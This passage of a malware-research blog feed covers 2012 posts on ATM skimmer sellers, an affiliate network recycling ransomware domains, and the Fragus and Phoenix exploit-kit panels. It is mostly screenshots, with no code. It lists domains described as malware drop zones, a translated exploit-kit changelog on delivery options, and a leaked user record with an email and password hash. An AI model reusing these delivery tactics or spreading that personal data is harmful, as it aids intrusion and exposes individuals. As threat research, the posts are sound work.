href="http://2.bp.blogspot.com/-02D_4ynHr3k/T6brEK8r-rI/AAAAAAAAF_w/lVAZKjp5O-w/s1600/2012-05-04+06.02.50.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-02D_4ynHr3k/T6brEK8r-rI/AAAAAAAAF_w/lVAZKjp5O-w/s400/2012-05-04+06.02.50.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-QzSMVbmlbFc/T6brF7ScCCI/AAAAAAAAF_4/ZaWveQ46OAs/s1600/2012-05-04+06.03.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-QzSMVbmlbFc/T6brF7ScCCI/AAAAAAAAF_4/ZaWveQ46OAs/s400/2012-05-04+06.03.04.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-EjtJGrqEIRc/T6brHoMplLI/AAAAAAAAGAA/wEVvmOzv2LI/s1600/2012-05-04+06.03.18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-EjtJGrqEIRc/T6brHoMplLI/AAAAAAAAGAA/wEVvmOzv2LI/s400/2012-05-04+06.03.18.jpg" width="400" /></a></div><br />"skimer4you" adv:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vuwt35dFkOY/T6bxiN2H0YI/AAAAAAAAGAY/e3lh8aDm5_I/s1600/06-05-2012+23-46-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://2.bp.blogspot.com/-vuwt35dFkOY/T6bxiN2H0YI/AAAAAAAAGAY/e3lh8aDm5_I/s400/06-05-2012+23-46-28.png" width="400" /></a></div><br />ICQ:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RKD6fHi1gr4/T6bZNVGg6MI/AAAAAAAAF7M/JLWfQkOeItY/s1600/biggie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-RKD6fHi1gr4/T6bZNVGg6MI/AAAAAAAAF7M/JLWfQkOeItY/s400/biggie.png" width="383" /></a></div><br />&nbsp;NCR:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eGUi3Gm6Dmw/T6baAqzffgI/AAAAAAAAF7U/6bMPJorl1-4/s1600/NCR+%281%29.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-eGUi3Gm6Dmw/T6baAqzffgI/AAAAAAAAF7U/6bMPJorl1-4/s400/NCR+%281%29.JPG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WIlf4YBSBQU/T6baJ-S7HlI/AAAAAAAAF7c/GSBvTrkB1R4/s1600/NCR+%282%29.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://1.bp.blogspot.com/-WIlf4YBSBQU/T6baJ-S7HlI/AAAAAAAAF7c/GSBvTrkB1R4/s400/NCR+%282%29.JPG" width="400" /></a></div><br />Nano: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-h6PKObWn9mk/T6baSOoLeOI/AAAAAAAAF7k/0VVDC8N7a6M/s1600/Nano+2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://4.bp.blogspot.com/-h6PKObWn9mk/T6baSOoLeOI/AAAAAAAAF7k/0VVDC8N7a6M/s400/Nano+2.JPG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-79r1AnISiYY/T6baSyKXD-I/AAAAAAAAF7s/mILtO7C9rOw/s1600/Nano.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-79r1AnISiYY/T6baSyKXD-I/AAAAAAAAF7s/mILtO7C9rOw/s400/Nano.JPG" width="400" /></a></div><br />&nbsp;Diebold:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-EeyuviHGs0M/T6baqc7_SeI/AAAAAAAAF70/jmjWrSy_9SM/s1600/Diebold+%282%29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://3.bp.blogspot.com/-EeyuviHGs0M/T6baqc7_SeI/AAAAAAAAF70/jmjWrSy_9SM/s400/Diebold+%282%29.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-CH_MpqF4F3c/T6bawoEaVnI/AAAAAAAAF78/LXN_4_VDIvQ/s1600/Diebold.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://3.bp.blogspot.com/-CH_MpqF4F3c/T6bawoEaVnI/AAAAAAAAF78/LXN_4_VDIvQ/s400/Diebold.jpg" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6853064496730826228?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/tracking-cyber-crime-atm-skimmers.htmlnoreply@blogger.com (Steven K)4tag:blogger.com,1999:blog-5365964245877416061.post-5501254446685370410Sun, 06 May 2012 13:47:00 +00002012-05-06T15:47:37.217+02:00malwareEroDerevo7xVideo15-Minut7xTUBEAdult7xVideo WG1OrgiGuruAffiliate7xVideo D1SexDerevoPaySitesClub affiliate recycle malware domains ?PaySitesClub is a private adult affiliate program, the domains used to send the traffics are:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://origuru.com/?pid=68<br />http://15-minut.com/?pid=68<br />http://sexderevo.com/?pid=68<br />http://eroderevo.com/?pid=68<br />http://7xtube.com/?pid=68<br />http://7xvideo.com/?pid=68<br />http://7xvideo.com/wg1/?pid=68</div><br />Problem... 7xtube.com/7xvideo was serving as winlock drop zone, and not only the domains, they used also the same templates during the whole campaign.<br />As well as SexDerevo/EroDerevo for <a href="http://xylibox.blogspot.fr/2011/07/trojanmbrlock-xxxvideoaviexe_10.html">MBRlock</a> earlier back in 2011.<br /><br />cf jsunpack: <a href="http://jsunpack.jeek.org/dec/getfile?hash=4ca9/03a571c56f1207e9398a0db5eb3a453b77d5">http://jsunpack.jeek.org/dec/getfile?hash=4ca9/03a571c56f1207e9398a0db5eb3a453b77d5</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wqbGYnP-7Hc/T6Y8lWYmOaI/AAAAAAAAF4Y/dioosSVuC18/s1600/code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-wqbGYnP-7Hc/T6Y8lWYmOaI/AAAAAAAAF4Y/dioosSVuC18/s400/code.png" width="397" /></a></div><br />Even in one of my old 2011 post, here is a screenshots of a domain with the template of SexDerevo.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-lt7sHMvaHEY/T6Y9jg77KqI/AAAAAAAAF4g/vUfFhhyyanY/s1600/06-05-2012+10-59-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-lt7sHMvaHEY/T6Y9jg77KqI/AAAAAAAAF4g/vUfFhhyyanY/s400/06-05-2012+10-59-31.png" width="400" /></a></div><br />Malware domains are sometime recycled in porn and months later, exploits and fake scanners are back.<br />recycling domains is not a new method, example here:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-fJHMpMrLmgg/T6Z9Br0zmDI/AAAAAAAAF6w/B09Z9jXKiYc/s1600/06-05-2012+15-30-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="http://2.bp.blogspot.com/-fJHMpMrLmgg/T6Z9Br0zmDI/AAAAAAAAF6w/B09Z9jXKiYc/s400/06-05-2012+15-30-01.png" width="400" /></a></div>Blackhole, Winlock, 0Access, PWS... you have the choice.<br /><br />PaySitesClub Advert:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-YfxPDyKjnyA/T6Y4fw9WVYI/AAAAAAAAF4M/VaeiZbtIUoE/s1600/06-05-2012+10-38-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="http://3.bp.blogspot.com/-YfxPDyKjnyA/T6Y4fw9WVYI/AAAAAAAAF4M/VaeiZbtIUoE/s400/06-05-2012+10-38-01.png" width="400" /></a></div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sLtXUq8PrbU/T6Y1bT74WQI/AAAAAAAAF20/J3FhZDL-pYQ/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-sLtXUq8PrbU/T6Y1bT74WQI/AAAAAAAAF20/J3FhZDL-pYQ/s400/1.login.png" width="400" /></a></div><br />Statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6zJb3nuoXeU/T6Y1hoBcRpI/AAAAAAAAF28/v3X-k2tnF0E/s1600/2.stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-6zJb3nuoXeU/T6Y1hoBcRpI/AAAAAAAAF28/v3X-k2tnF0E/s400/2.stats.png" width="400" /></a></div><br />Invites:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Nsl-iSMIE9c/T6Y1rQP41uI/AAAAAAAAF3E/B-kOwfwDaRY/s1600/invite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-Nsl-iSMIE9c/T6Y1rQP41uI/AAAAAAAAF3E/B-kOwfwDaRY/s400/invite.png" width="400" /></a></div><br />Subaccounts:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-O1OmMThVmTI/T6Y1xY_mRQI/AAAAAAAAF3M/WUyRNa9ahsQ/s1600/subaccount.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-O1OmMThVmTI/T6Y1xY_mRQI/AAAAAAAAF3M/WUyRNa9ahsQ/s400/subaccount.png" width="400" /></a></div><br />News/About: (funny things, they asked Kaspersky to remove detections of 7xtube and 7xvideo)<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">21.03.2012 - Уважаемые партнёры, с доменов 7xtube.com и 7xvideo.com сняты все санкции антивируса Kaspersky. Мы как всегда очень оперативно решили проблему!</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_WT2PoZhbwQ/T6Y14_2WIrI/AAAAAAAAF3U/Tkz-n425VF8/s1600/3.news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-_WT2PoZhbwQ/T6Y14_2WIrI/AAAAAAAAF3U/Tkz-n425VF8/s400/3.news.png" width="296" /></a></div><br />Sites:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9V5H1fLbvKk/T6Y3SlF3ajI/AAAAAAAAF38/OfBIsvtg4E0/s1600/4.sites.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-9V5H1fLbvKk/T6Y3SlF3ajI/AAAAAAAAF38/OfBIsvtg4E0/s400/4.sites.png" width="367" /></a></div><br />Profile:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Wocl6URw120/T6Y3bWpD8DI/AAAAAAAAF4E/HJiQ2N1srx4/s1600/5.profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-Wocl6URw120/T6Y3bWpD8DI/AAAAAAAAF4E/HJiQ2N1srx4/s400/5.profile.png" width="400" /></a></div><br />Active subscriptions:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WKUt6qgduZU/T6Y2T3VNXdI/AAAAAAAAF3k/hLaraypHIBo/s1600/6.active+subscriptions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-WKUt6qgduZU/T6Y2T3VNXdI/AAAAAAAAF3k/hLaraypHIBo/s400/6.active+subscriptions.png" width="400" /></a></div><br />Last SMS:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XChcbiu-LmA/T6Y26IU5U2I/AAAAAAAAF3s/ysMltLnE-Qs/s1600/7.last.sms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="http://2.bp.blogspot.com/-XChcbiu-LmA/T6Y26IU5U2I/AAAAAAAAF3s/ysMltLnE-Qs/s400/7.last.sms.png" width="400" /></a></div><br />Last numbers:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-lYRJDrpmtTg/T6Y3C49bHnI/AAAAAAAAF30/tCKHk75y_zQ/s1600/8.last.numbers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-lYRJDrpmtTg/T6Y3C49bHnI/AAAAAAAAF30/tCKHk75y_zQ/s400/8.last.numbers.png" width="320" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-5501254446685370410?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/paysitesclub-affiliate-recycle-malware.htmlnoreply@blogger.com (Steven K)2tag:blogger.com,1999:blog-5365964245877416061.post-765381563052637014Fri, 04 May 2012 15:51:00 +00002012-05-05T10:28:07.897+02:00ExploitFragus Exploit KitFragusexploit kitFragus exploit kitAdvert:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-YXPOYokhHSM/T6PjC9UJ-EI/AAAAAAAAF2A/WsFqhTFA0qY/s1600/04-05-2012+16-07-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-YXPOYokhHSM/T6PjC9UJ-EI/AAAAAAAAF2A/WsFqhTFA0qY/s400/04-05-2012+16-07-41.png" width="266" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qoHcnszxW2E/T6PjepoZ5jI/AAAAAAAAF2I/NAebQyjdc3s/s1600/04-05-2012+16-10-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="http://1.bp.blogspot.com/-qoHcnszxW2E/T6PjepoZ5jI/AAAAAAAAF2I/NAebQyjdc3s/s400/04-05-2012+16-10-14.png" width="400" /></a></div><br />Visual map:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-uxz_Ar4qQWg/T6P5TaQLayI/AAAAAAAAF2Y/-EHmQk1Cjc4/s1600/fragus-visual.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://1.bp.blogspot.com/-uxz_Ar4qQWg/T6P5TaQLayI/AAAAAAAAF2Y/-EHmQk1Cjc4/s400/fragus-visual.png" width="400" /></a></div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sFC6BT63KOk/T6PZRV5J80I/AAAAAAAAF1I/1xPqhoG2NJw/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-sFC6BT63KOk/T6PZRV5J80I/AAAAAAAAF1I/1xPqhoG2NJw/s400/1.login.png" width="400" /></a></div><br />Statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GMC5Z30jqEw/T6PZWLcCWMI/AAAAAAAAF1Q/N2U8jtYCvbc/s1600/2.statistics.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="http://1.bp.blogspot.com/-GMC5Z30jqEw/T6PZWLcCWMI/AAAAAAAAF1Q/N2U8jtYCvbc/s400/2.statistics.png" width="400" /></a></div><br />Files:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LsE4n2xhhTc/T6PZbmUWbtI/AAAAAAAAF1Y/4t2Ddv0lWCU/s1600/2.files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-LsE4n2xhhTc/T6PZbmUWbtI/AAAAAAAAF1Y/4t2Ddv0lWCU/s400/2.files.png" width="400" /></a></div><br />Sellers:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Jdrlg1nbPkI/T6PZgYb3m8I/AAAAAAAAF1g/qMZZ9Gq-240/s1600/4.seller.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-Jdrlg1nbPkI/T6PZgYb3m8I/AAAAAAAAF1g/qMZZ9Gq-240/s400/4.seller.png" width="400" /></a></div><br />Preferences:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-6dwQx0BRKj4/T6PZlEf0GlI/AAAAAAAAF1o/4CQKxjLOI4A/s1600/5.preferences.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-6dwQx0BRKj4/T6PZlEf0GlI/AAAAAAAAF1o/4CQKxjLOI4A/s400/5.preferences.png" width="400" /></a></div><br />And clicking "Traffic links" lead the server to error 500 ¬_¬<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-O5DUMyuX37g/T6PemiBCwzI/AAAAAAAAF10/22h7lm5kKdg/s1600/fragus_lol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://2.bp.blogspot.com/-O5DUMyuX37g/T6PemiBCwzI/AAAAAAAAF10/22h7lm5kKdg/s400/fragus_lol.png" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-765381563052637014?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/fragus-exploit-kit.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-5045045062293925143Tue, 01 May 2012 16:44:00 +00002012-05-01T18:44:19.296+02:00PhoenixJava AtomicPhoenix Exploit Kit 3.1Phoenix Exploit Kitjava rhinoExploitKitPhoenix Exploit's Kit 3.1 full3.1 changelog in Russian:<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bVIxViCWEqY/T5uUbbCXjuI/AAAAAAAAFyM/qe6Q1wex4Q8/s1600/alexudakov.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="http://2.bp.blogspot.com/-bVIxViCWEqY/T5uUbbCXjuI/AAAAAAAAFyM/qe6Q1wex4Q8/s400/alexudakov.PNG" width="400" /></a></div><br />Java Web Start 2012 exploit:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-E5IhFOxH_Hs/T5uwGzYUFHI/AAAAAAAAFzE/QL35MbSM5Kc/s1600/java.web.start.2012.exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="http://4.bp.blogspot.com/-E5IhFOxH_Hs/T5uwGzYUFHI/AAAAAAAAFzE/QL35MbSM5Kc/s400/java.web.start.2012.exploit.png" width="400" /></a></div><br /><br /><br /><br /><center><img border="0" src="http://2.bp.blogspot.com/-Cb_LdnHiz0o/T5uzmdsTweI/AAAAAAAAFzU/I-GKdwGf00M/s1600/files.png" /></center><br /><br />Schem about alexudakov (not really searched)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-oe1Zt1ECbHI/T5uyfZWOGsI/AAAAAAAAFzM/pJ8Htnu8FTo/s1600/icq.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://4.bp.blogspot.com/-oe1Zt1ECbHI/T5uyfZWOGsI/AAAAAAAAFzM/pJ8Htnu8FTo/s400/icq.PNG" width="400" /></a></div><br />3.1 changelog translated by EP_X0FF <br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">We are pleased to present new version of pack 3.1!<br /><br />-----------v3.1------------------------------------<br /><br />[+]Added new JAVA ATOMIC exploit of JRE 1.6.0-1.6.0_30, 1.7.0-1.7.0_2 for FF/IE/OPERA. Sufficiently increased exploitation success.<br /><br />[+]JAVA TC and JAVA RHINO combined in one .jar file<br /><br />[+]added 4 activation variants:<br /><br /><br />1)JAVA with version determination, PDF with version determination before load<br />2)JAVA without version determination, PDF with version determination before load<br />3)JAVA with version determination, PDF without version determination before load<br />4)JAVA without version determination, PDF with version determination before load<br /><br />This flexible system allows for longer not to kill traffic sources (actual for iframe traffic) or conversely with little sacrifice of traffic sources raise exploitation success (actual for Pop up traffic)<br /><br />[+]The exploits delivery chain has been rewritten to be up to date, has been removed JAVA SMB, JAVA TRUST, FLASH 10 because they are no longer actual. As a consequence, there was easy to configure and install - no-Apache on port 8080 and SMB configs.</div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-FCdBAHxxMIE/T5vbTPrAVFI/AAAAAAAAFzg/X3QG-j4nuYM/s1600/login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-FCdBAHxxMIE/T5vbTPrAVFI/AAAAAAAAFzg/X3QG-j4nuYM/s400/login.PNG" width="400" /></a></div><br />Simple statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-c_eDSyEGZjI/T5vbYF-0MYI/AAAAAAAAFzo/LzKl7JvAgRs/s1600/dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-c_eDSyEGZjI/T5vbYF-0MYI/AAAAAAAAFzo/LzKl7JvAgRs/s400/dashboard.png" width="400" /></a></div><br />Advenced statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XCDp3OgHqOU/T5vbdhuZAxI/AAAAAAAAFzw/7QM9yQcBFo8/s1600/advenced-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-XCDp3OgHqOU/T5vbdhuZAxI/AAAAAAAAFzw/7QM9yQcBFo8/s400/advenced-stat.png" width="400" /></a></div><br />&nbsp;Countries statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2Q7JEZZklf0/T5vbiK7EiGI/AAAAAAAAFz4/qF_GMZ56R9Y/s1600/country-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-2Q7JEZZklf0/T5vbiK7EiGI/AAAAAAAAFz4/qF_GMZ56R9Y/s400/country-stat.png" width="400" /></a></div><br />Referers statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ZOxDzG3PCjM/T5vbmnMGSqI/AAAAAAAAF0A/99t7Ix79dQs/s1600/referrer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="http://4.bp.blogspot.com/-ZOxDzG3PCjM/T5vbmnMGSqI/AAAAAAAAF0A/99t7Ix79dQs/s400/referrer.png" width="400" /></a></div><br />Sources statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MKqGswZXKtM/T5vbrVJ6gxI/AAAAAAAAF0I/YoSQUIQivzM/s1600/sources-stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-MKqGswZXKtM/T5vbrVJ6gxI/AAAAAAAAF0I/YoSQUIQivzM/s400/sources-stats.png" width="400" /></a></div><br />Clear statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MpDCmqh4Wqw/T5vbwXBN47I/AAAAAAAAF0Q/zEwRMlHGydg/s1600/clear-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-MpDCmqh4Wqw/T5vbwXBN47I/AAAAAAAAF0Q/zEwRMlHGydg/s400/clear-stat.png" width="400" /></a></div><br />Upload .exe:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-xjTNP5S95Mw/T5vb2KX9enI/AAAAAAAAF0Y/gMX8WJv82do/s1600/upload-a-file.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-xjTNP5S95Mw/T5vb2KX9enI/AAAAAAAAF0Y/gMX8WJv82do/s400/upload-a-file.png" width="400" /></a></div><br /><br />Dumped files, CVE-2010-0094 detected as Blacole.FK by MSE. <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-SXHVqUuwdCs/T5uSzOQoyBI/AAAAAAAAFyE/EAUUZ64SnNY/s1600/phoenixfiles.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="http://3.bp.blogspot.com/-SXHVqUuwdCs/T5uSzOQoyBI/AAAAAAAAFyE/EAUUZ64SnNY/s400/phoenixfiles.PNG" width="400" /></a></div><br />Phoenix landing:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sZ-AFRe-GYM/T5uVdnJSBtI/AAAAAAAAFyU/a_wK6xdMJQ4/s1600/landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="http://3.bp.blogspot.com/-sZ-AFRe-GYM/T5uVdnJSBtI/AAAAAAAAFyU/a_wK6xdMJQ4/s400/landing.png" width="400" /></a></div><br />Part of the code, looking for the os version<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/--7O1cU9tXTk/T5uXrNXmiLI/AAAAAAAAFyc/49TkHk-ipf4/s1600/part.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="http://3.bp.blogspot.com/--7O1cU9tXTk/T5uXrNXmiLI/AAAAAAAAFyc/49TkHk-ipf4/s400/part.png" width="400" /></a></div><br />Welcome to our show... hack the planet<br /><div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: #66cc66;">(</span><span style="color: red;">`id`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`user_name`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`pass_hash`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`money`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`activated`</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">VALUES</span> <span style="color: #66cc66;">(</span><span style="color: red;">'588'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'alexudakov'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'d8228ee30f409166ff72ecf6642ad9fc'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'0.00'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'0'</span><span style="color: #66cc66;">)</span>;<br /><span style="color: #66cc66;">(</span><span style="color: red;">`user_id`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`icq`</span><span style="color: #66cc66;">,</span> <span style="color: red;">`email`</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">VALUES</span> <span style="color: #66cc66;">(</span><span style="color: red;">'588'</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: red;">'andrey89@nextmail.ru'</span><span style="color: #66cc66;">)</span>;</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-FEjn3WPaTbM/T5unlE31OEI/AAAAAAAAFy0/42Lir2WhvDs/s1600/Imma+pirate+ALL+THE+THINGS%21_1331448881573.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://4.bp.blogspot.com/-FEjn3WPaTbM/T5unlE31OEI/AAAAAAAAFy0/42Lir2WhvDs/s400/Imma+pirate+ALL+THE+THINGS%21_1331448881573.jpg" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-5045045062293925143?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/phoenix-exploits-kit-31-full.htmlnoreply@blogger.com (Steven K)4tag:blogger.com,1999:blog-5365964245877416061.post-2063037032381152009Fri, 20 Apr 2012 19:26:00 +00002012-05-05T16:58:19.208+02:00winlocksacemlifeSilence WinlockerSilence Winlocker<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-GPVn5c6xlaE/T5GuDk2PwGI/AAAAAAAAFuU/rw8vv6PulhY/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="http://4.bp.blogspot.com/-GPVn5c6xlaE/T5GuDk2PwGI/AAAAAAAAFuU/rw8vv6PulhY/s400/email.png" width="400" 